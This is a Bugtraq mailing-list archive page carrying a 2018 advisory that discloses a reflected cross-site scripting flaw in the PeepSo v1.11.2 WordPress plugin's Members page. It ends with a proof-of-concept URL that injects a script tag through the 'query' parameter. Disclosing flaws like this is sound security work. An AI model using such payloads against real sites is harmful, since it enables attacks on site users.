| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201811092215.wA9MFZYK005977@ip-100-122-153-233.us-east-1.ec2.aws.symcpe.net>
Date: Fri, 9 Nov 2018 22:15:35 GMT
From: Socket_0x03@...aexe.com
To: bugtraq@...urityfocus.com
Subject: PeepSo v1.11.2 (WordPress Plugin) - XSS Vulnerability in Members
===================================================================================
PeepSo v1.11.2 (WordPress Plugin) - Cross-Site Scripting Vulnerability in “Members"
===================================================================================
____________________________________________________________________________________
# Exploit Title: PeepSo v1.11.2 (WordPress Plugin) - XSS Vulnerability in Members
# Date: [11-09-2018]
# Category: Webapps
____________________________________________________________________________________
# Author: Socket_0x03 (Alvaro J. Gene)
# Email: Socket_0x03 (at) teraexe (dot) com
# Website: www.teraexe.com
____________________________________________________________________________________
# Software Link: https://wordpress.org/plugins/peepso-core/
# Plugin: PeepSo
# Version: 1.11.2
# File: Members
# Parameter: query
# Language: This application is available in English language.
# Plugin Description: PeepSo is a social network plugin for WordPress with different
kinds of features, such as user profiles, user registration, and other features.
____________________________________________________________________________________
# Cross-Site Scripting Vulnerability:
http://www.website.com/wordpress/index.php/members/?blocked/&query="><script>alert(23)</script>
Powered by blists - more mailing lists